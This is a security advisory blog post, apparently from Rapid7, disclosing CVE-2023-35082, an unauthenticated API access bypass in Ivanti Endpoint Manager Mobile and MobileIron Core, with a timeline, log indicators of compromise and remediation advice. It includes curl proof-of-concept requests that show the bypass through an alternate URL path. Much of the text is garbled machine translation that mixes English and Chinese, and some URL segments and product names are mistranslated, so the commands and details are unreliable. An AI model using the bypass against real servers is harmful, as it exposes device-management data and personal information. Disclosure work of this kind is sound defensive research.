Last updated at Fri, 19 Jan 2024 10:24:39 GMT

When this blog was originally published on August 2, it said that cve - 2023 - 35082 only affected MobileIron Core 11.2 和 earlier, which are unsupported. On August 7, Ivanti published an 更新咨询 noting that since originally disclosing cve - 2023 - 35082, 他们继续调查并发现该漏洞影响所有版本的Ivanti Endpoint 经理 Mobile (EPMM) 11.10, 11.9和11.8, MobileIron Core 11.7岁及以下. 被利用的风险取决于单个客户的配置.

概述

在调查 cve - 2023 - 35078, 在Ivanti Endpoint 经理 Mobile和MobileIron Core中存在一个严重的API访问漏洞,该漏洞在野外被利用, Rapid7发现了一个新的漏洞,允许未经身份验证的攻击者访问API(最初认为只影响11.2及以下). Rapid7于2023年7月26日向Ivanti报告了此漏洞 vulnerability disclosure policy. The new vulnerability was assigned cve - 2023 - 35082.

Since cve - 2023 - 35082 arises from the same place as cve - 2023 - 35078, specifically the permissive nature of certain entries in the mif web application’s security filter chain, Rapid7会认为这个新漏洞是cve - 2023 - 35078的补丁绕过. For additional context on cve - 2023 - 35078 和 its impact, see Rapid7’s emergent threat response blog here 和我们的 AttackerKB评估 的弱点.

注意: 美国.S. Cybersecurity 和 Infrastructure Security Agency (CISA) has 添加cve - 2023 - 35082 to its Known Exploited Vulnerabilities (KEV) list as of January 18, 2024.

产品描述

Ivanti Endpoint 经理 Mobile (EPMM), 前身为MobileIron Core, is a management platform that allows an organization to manage mobile devices such as phones 和 tablets; enforcing content 和 application policies on these devices. The product was previously called MobileIron Core, 和 was rebr和ed to Endpoint 经理 Mobile after 伊凡蒂收购了MobileIron in 2020.

版本11.8 和 above of the product are Endpoint 经理 Mobile. Rapid7确定的易受cve - 2023 - 35082攻击的产品版本是MobileIron Core. 在8月2日首次披露之前,Ivanti告诉Rapid7 cve - 2023 - 35082 影响 the following versions of the product:

  • MobileIron Core 11.2及以下

2023年8月7日Ivanti表示,cve - 2023 - 35082会影响以下版本的产品:

  • Endpoint 经理 Mobile 11.10
  • Endpoint 经理 Mobile 11.9
  • Endpoint 经理 Mobile 11.8
  • MobileIron Core 11.7岁及以下

伊凡蒂有一个 此处提供最新建议 截至8月7日.

信贷

这个问题最初是由Stephen less(微软首席安全研究员)发现的 Rapid7, 和 is being disclosed in accordance with Rapid7's vulnerability disclosure policy. Rapid7谢谢 Florian豪泽 of 代码的白色 我们注意到,在代码的白色进行的测试中,新版端点管理器移动版似乎容易受到cve - 2023 - 35082的攻击.

供应商声明

Ivanti provided the following updated statement to Rapid7 on August 7:

我们非常感谢Rapid7和Stephen less在MobileIron Core / Ivanti EPMM中发现了一个现在报告为cve - 2023 - 35082的问题. Ivanti现在有一个可用的RPM脚本,并且正在与客户一起帮助他们应用修复.

我们正在继续对Ivanti Endpoint 经理 Mobile (EPMM)进行调查,并积极与客户合作,以降低风险并保护他们的环境. We will continue to update the Ivanti blog as we have more information.

影响

cve - 2023 - 35082允许远程未经身份验证的攻击者访问暴露的管理服务器上的API端点. 攻击者可以使用这些API端点来执行大量操作 API官方文件, 包括披露个人身份信息(PII)和对平台执行修改的能力. 另外, should a separate vulnerability be present in the API, an attacker can chain these vulnerabilities together. 例如, cve - 2023 - 35081 是否可以与cve - 2023 - 35082链接,以允许攻击者将恶意webshell文件写入设备, which may then be executed by the attacker.

剥削

在我们对cve - 2023 - 35078的测试中,我们访问了MobileIron Core版本11.2.0.0-31. 在复制原始漏洞后,我们继续应用Ivanti的热修复程序 ivanti-security-update-1.0.0-1.noarch.rpm 根据 Ivanti 知识库文章 000087042. We verified that the hotfix does successfully remediate cve - 2023 - 35078. 然而, 我们发现了同一攻击的一种变体,它允许远程攻击者在没有身份验证的情况下访问API端点.

First we installed MobileIron Core 11.2.0.0-31和验证,我们可以利用cve - 2023 - 35078访问未经身份验证的API端点. 注意,其中包含 /广告/ 段,以利用原始漏洞cve - 2023 - 35078.

c:\> curl -k http://192.168.86.103 / mif /广告/ api / v2 /平
{"结果":{“apiVersion”:2.0,“vspVersion”:“垂直地震剖面11.2.0.0 Build 31 "}}

We then installed the vendor-supplied hotfix ivanti-security-update-1.0.0-1.noarch.rpm. 在我们重启系统之后, 我们验证了热修复程序可以防止上面显示的原始漏洞利用请求.

c:\> curl -k http://192.168.86.103 / mif /广告/ api / v2 /平


        
HTTP Status 403 - Access is denied

        
You are unauthorized to access this page.

然而, 上述请求的一个变体仍然可以在没有身份验证的情况下访问API端点, 如下所示. 注意的用法 / asfV3 / in the URL path in place of the original exploit’s use of /广告/.

c:\> curl -k http://192.168.86.103 / mif / asfV3 / api / v2 /平
{"结果":{“apiVersion”:2.0,“vspVersion”:“垂直地震剖面11.2.0.0 Build 31 "}}

妥协指标

设备上存储的Apache HTTP日志中显示了以下泄漏指标.

日志文件 /var/log/httpd/http-access_log 将有一个条目显示对目标API端点的请求,其中包含 / mif / asfV3 / api / v2 / 在小路上 with a HTTP response code of 200. 被阻止的利用尝试将显示HTTP响应代码401或403. 例如:

192.168.86.34:61736 - - 2023-07-28--15-24-51 "GET / mif / asfV3 / api / v2 /ping HTTP/1.1" 200 "-" 68 "-"卷曲/8.0.1" 3285

类似地,日志文件 /var/log/httpd/http-request_log 将有一个条目显示对目标API端点的请求,其中包含 / mif / asfV3 / api / v2 / 在小路上. 例如:

2023-07-28--15-24-51 192.168.86.34 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET / mif / asfV3 / api / v2 /ping HTTP/1.1“68”-“”卷曲/8.0.1"

Note that log entries containing / mif / asfV3 / api / v2 / 路径中的漏洞表明利用了cve - 2023 - 35082,而日志条目中包含 / mif /广告/ api / v2 / 在小路上 indicate exploitation of cve - 2023 - 35078.

修复

正如他们的 咨询, 伊凡蒂有一个 RPM Fix for versions 11.10 to 11.3 available 截至8月7日, 2023. Customers on older versions should first upgrade to 11.10,然后应用RPM修复. More information is available in a 知识库文章 on the Ivanti Community portal.

Rapid7建议MobileIron Core客户尽快升级到受支持的版本. 运行易受cve - 2023 - 35082攻击的端点管理器移动版本的客户应尽快应用Ivanti的RPM修复程序, without waiting for a regular patch cycle to occur.

Rapid7客户

截至8月2日,InsightVM和expose客户可以使用cve - 2023 - 35082的未经身份验证的漏洞检查, 2023年内容发布.

时间轴

  • 2023年7月26日: Rapid7 sends disclosure information to Ivanti security.
  • 2023年7月28日: Rapid7通过第二个渠道联系伊凡蒂,确认收到披露信息. Ivanti confirms initial disclosure was not received. Rapid7 resends disclosure documents. 伊凡蒂确认收到.
  • 2023年7月28日: 伊万蒂证实了这一发现.
  • 2023年7月31日: Ivanti confirms a security 咨询 will be published, 要求与Rapid7通电话,解决他们认为我们披露的不准确之处.
  • 2023年8月1日: Rapid7和Ivanti讨论了两个漏洞(cve - 2023 - 35078, cve - 2023 - 35082). Rapid7同意更新这一披露,澄清伊万蒂的观点. Rapid7 also agrees to clarify product terminology (i.e., that cve - 2023 - 35082 only 影响 MobileIron Core, 而不是后来更名为Endpoint 经理 Mobile的产品版本).
  • 2023年8月2日: 这种披露.
  • 2023年8月3日至4日: 外部研究联系人; Florian豪泽 白色代码, 我们联系了Rapid7,透露他们已经发现最新版本的Endpoint 经理 Mobile, 11.10.03 Build 2在特定配置下易受cve - 2023 - 35082攻击. Rapid7 contacts Ivanti, who indicates they are investigating.
  • 2023年8月6日: Ivanti向Rapid7证实,该产品的其他版本容易受到cve - 2023 - 35082的攻击, proposes an August 7 disclosure that will note new fixes.
  • 2023年8月7日: 更新后的披露.
  • 2024年1月18日: 美国.S. Cybersecurity 和 Infrastructure Security Agency (CISA) has 添加cve - 2023 - 35082 to its Known Exploited Vulnerabilities (KEV) list.